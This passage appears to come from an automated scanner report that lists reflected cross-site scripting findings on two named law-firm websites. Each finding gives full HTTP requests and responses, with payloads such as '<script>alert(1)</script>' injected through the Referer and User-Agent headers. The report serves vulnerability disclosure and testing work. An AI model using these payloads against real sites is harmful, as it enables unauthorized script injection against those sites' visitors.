Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /experience.cfm HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=69495883; __utmz=248117591.1303088780.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24313245; __utma=248117591.1927048576.1303088780.1303088780.1303088780.1; __utmc=248117591; __utmb=248117591.1.10.1303088780; sifrFetch=true;
Referer: http://www.google.com/search?hl=en&q=5b23d"><a>17b8f11a572

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 01:54:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">

<html>
<head>
   
       <title>Arnold & Porter LLP - Experience</title>
       <meta name="Description" conte
...[SNIP]...
<a href="http://www.google.com/search?hl=en&q=5b23d"><a>17b8f11a572">
...[SNIP]...
4.194. http://www.arnoldporter.com/industries.cfm [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.arnoldporter.com
Path:   /industries.cfm

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1dc2"><a>c60c04f9f8c was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /industries.cfm HTTP/1.1
Host: www.arnoldporter.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=e1dc2"><a>c60c04f9f8c
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=24313245; CFTOKEN=69495883; sifrFetch=true; __utmz=248117591.1303088780.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=248117591.1927048576.1303088780.1303088780.1303088780.1; __utmc=248117591; __utmb=248117591.1.10.1303088780

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 01:10:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">

<html>
<head>
   
       <title>Arnold & Porter LLP - Industries</title>
       <meta name="Description" conte
...[SNIP]...
<a href="http://www.google.com/search?hl=en&q=e1dc2"><a>c60c04f9f8c">
...[SNIP]...
4.195. http://www.arnoldporter.com/multimedia.cfm [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.arnoldporter.com
Path:   /multimedia.cfm

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f81da"><a>9596bd80369 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /multimedia.cfm HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=69495883; __utmz=248117591.1303088780.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24313245; __utma=248117591.1927048576.1303088780.1303088780.1303088780.1; __utmc=248117591; __utmb=248117591.1.10.1303088780; sifrFetch=true;
Referer: http://www.google.com/search?hl=en&q=f81da"><a>9596bd80369

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 01:51:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">

<html>
<head>
   
       <title>Arnold & Porter LLP - Multimedia</title>
       <meta name="Description" conte
...[SNIP]...
<a href="http://www.google.com/search?hl=en&q=f81da"><a>9596bd80369">
...[SNIP]...
4.196. http://www.arnoldporter.com/practices.cfm [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.arnoldporter.com
Path:   /practices.cfm

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5548b"><a>9c4c29a21de was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /practices.cfm HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=69495883; __utmz=248117591.1303088780.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24313245; __utma=248117591.1927048576.1303088780.1303088780.1303088780.1; __utmc=248117591; __utmb=248117591.1.10.1303088780; sifrFetch=true;
Referer: http://www.google.com/search?hl=en&q=5548b"><a>9c4c29a21de

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 01:50:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">

<html>
<head>
   
       <title>Arnold & Porter LLP - Practice Areas &amp; Industries</title>
       <meta nam
...[SNIP]...
<a href="http://www.google.com/search?hl=en&q=5548b"><a>9c4c29a21de">
...[SNIP]...
4.197. http://www.arnoldporter.com/press_releases.cfm [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.arnoldporter.com
Path:   /press_releases.cfm

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8e451"><a>3e8da4e5dbe was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /press_releases.cfm HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=69495883; __utmz=248117591.1303088780.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24313245; __utma=248117591.1927048576.1303088780.1303088780.1303088780.1; __utmc=248117591; __utmb=248117591.1.10.1303088780; sifrFetch=true;
Referer: http://www.google.com/search?hl=en&q=8e451"><a>3e8da4e5dbe

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 01:51:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">

<html>
<head>
   
       <title>Arnold & Porter LLP - Press Releases</title>
       <meta name="Description" c
...[SNIP]...
<a href="http://www.google.com/search?hl=en&q=8e451"><a>3e8da4e5dbe">
...[SNIP]...
4.198. http://www.arnoldporter.com/publications.cfm [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.arnoldporter.com
Path:   /publications.cfm

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a0285"><a>8c4e66afe60 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /publications.cfm HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=69495883; __utmz=248117591.1303088780.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24313245; __utma=248117591.1927048576.1303088780.1303088780.1303088780.1; __utmc=248117591; __utmb=248117591.1.10.1303088780; sifrFetch=true;
Referer: http://www.google.com/search?hl=en&q=a0285"><a>8c4e66afe60

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 01:51:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">

<html>
<head>
   
       <title>Arnold & Porter LLP - Publications</title>
       <meta name="Description" con
...[SNIP]...
<a href="http://www.google.com/search?hl=en&q=a0285"><a>8c4e66afe60">
...[SNIP]...
4.199. http://www.arnoldporter.com/search.cfm [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.arnoldporter.com
Path:   /search.cfm

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7da06"><a>93ef183841b was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /search.cfm HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=69495883; __utmz=248117591.1303088780.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24313245; __utma=248117591.1927048576.1303088780.1303088780.1303088780.1; __utmc=248117591; __utmb=248117591.1.10.1303088780; sifrFetch=true;
Referer: http://www.google.com/search?hl=en&q=7da06"><a>93ef183841b

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 01:50:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">

<html>
<head>
   
       <title>Arnold & Porter LLP - Search Form</title>
       <meta name="Description" cont
...[SNIP]...
<a href="http://www.google.com/search?hl=en&q=7da06"><a>93ef183841b">
...[SNIP]...
4.200. http://www.friedfrank.com/ [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.friedfrank.com
Path:   /

Issue detail

The value of the User-Agent HTTP header is copied into the HTML document as plain text between tags. The payload 77d77<script>alert(1)</script>d7124e24d9 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET / HTTP/1.1
Host: www.friedfrank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)77d77<script>alert(1)</script>d7124e24d9
Connection: close
Cookie: JSMOBILE=0; CFTOKEN=88414738; __utmz=113041875.1303088795.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=31349998; __utma=113041875.727875777.1303088795.1303088795.1303088795.1; __utmc=113041875; __utmb=113041875.2.10.1303088795;

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Mon, 18 Apr 2011 01:50:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
server-error: true
Content-Type: text/html; charset=UTF-8

<!-- " ---></TD></TD></TD></TH></TH></TH></TR></TR></TR></TABLE></TABLE></TABLE></A></ABBREV></ACRONYM></ADDRESS></APPLET></AU></B></BANNER></BIG></BLINK></BLOCKQUOTE></BQ></CAPTION></CENTER></CITE></
...[SNIP]...
<font style="COLOR: black; FONT: 8pt/11pt verdana">Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)77d77<script>alert(1)</script>d7124e24d9</td>
...[SNIP]...
4.201. http://www.friedfrank.com/includes/vcard.cfm [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.friedfrank.com
Path:   /includes/vcard.cfm

Issue detail

The value of the User-Agent HTTP header is copied into the HTML document as plain text between tags. The payload 1dfa8<script>alert(1)</script>89a12df46cb was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /includes/vcard.cfm HTTP/1.1
Host: www.friedfrank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)1dfa8<script>alert(1)</script>89a12df46cb
Connection: close
Cookie: JSMOBILE=0; CFTOKEN=88414738; __utmz=113041875.1303088795.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=31349998; __utma=113041875.727875777.1303088795.1303088795.1303088795.1; __utmc=113041875; __utmb=113041875.2.10.1303088795;

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Mon, 18 Apr 2011 01:50:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
server-error: true
Content-Type: text/html; charset=UTF-8

<!-- " ---></TD></TD></TD></TH></TH></TH></TR></TR></TR></TABLE></TABLE></TABLE></A></ABBREV></ACRONYM></ADDRESS></APPLET></AU></B></BANNER></BIG></BLINK></BLOCKQUOTE></BQ></CAPTION></CENTER></CITE></
...[SNIP]...
<font style="COLOR: black; FONT: 8pt/11pt verdana">Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)1dfa8<script>alert(1)</script>89a12df46cb</td>
...[SNIP]...
4.202. http://www.friedfrank.com/index.cfm [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.friedfrank.com
Path:   /index.cfm

Issue detail

The value of the User-Agent HTTP header is copied into the HTML document as plain text between tags. The payload 8e740<script>alert(1)</script>1b6d2f1cdba was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /index.cfm HTTP/1.1
Host: www.friedfrank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)8e740<script>alert(1)</script>1b6d2f1cdba
Connection: close
Cookie: JSMOBILE=0; CFTOKEN=88414738; __utmz=113041875.1303088795.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=31349998; __utma=113041875.727875777.1303088795.1303088795.1303088795.1; __utmc=113041875; __utmb=113041875.2.10.1303088795;

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Mon, 18 Apr 2011 01:50:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
server-error: true
Content-Type: text/html; charset=UTF-8

<!-- " ---></TD></TD></TD></TH></TH></TH></TR></TR></TR></TABLE></TABLE></TABLE></A></ABBREV></ACRONYM></ADDRESS></APPLET></AU></B></BANNER></BIG></BLINK></BLOCKQUOTE></BQ></CAPTION></CENTER></CITE></
...[SNIP]...
<font style="COLOR: black; FONT: 8pt/11pt verdana">Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)8e740<script>alert(1)</script>1b6d2f1cdba</td>
...[SNIP]...
4.203. http://www.friedfrank.com/printfriendly.cfm [User-Agent HTTP header]  previous

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.friedfrank.com
Path:   /printfriendly.cfm

Issue detail

The value of the User-Agent HTTP header is copied into the HTML document as plain text between tags. The payload c2767<script>alert(1)</script>7516a2e75de was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /printfriendly.cfm HTTP/1.1
Host: www.friedfrank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)c2767<script>alert(1)</script>7516a2e75de
Connection: close
Cookie: JSMOBILE=0; CFTOKEN=88414738; __utmz=113041875.1303088795.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=31349998; __utma=113041875.727875777.1303088795.1303088795.1303088795.1; __utmc=113041875; __utmb=113041875.2.10.1303088795;

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Mon, 18 Apr 2011 01:50:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
server-error: true
Content-Type: text/html; charset=UTF-8

<!-- " ---></TD></TD></TD></TH></TH></TH></TR></TR></TR></TABLE></TABLE></TABLE></A></ABBREV></ACRONYM></ADDRESS></APPLET></AU></B></BANNER></BIG></BLINK></BLOCKQUOTE></BQ></CAPTION></CENTER></CITE></
...[SNIP]...
<font style="COLOR: black; FONT: 8pt/11pt verdana">Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)c2767<script>alert(1)</script>7516a2e75de</td>
...[SNIP]...
Report generated by XSS.CX at Wed Apr 20 11:28:22 CDT 2011.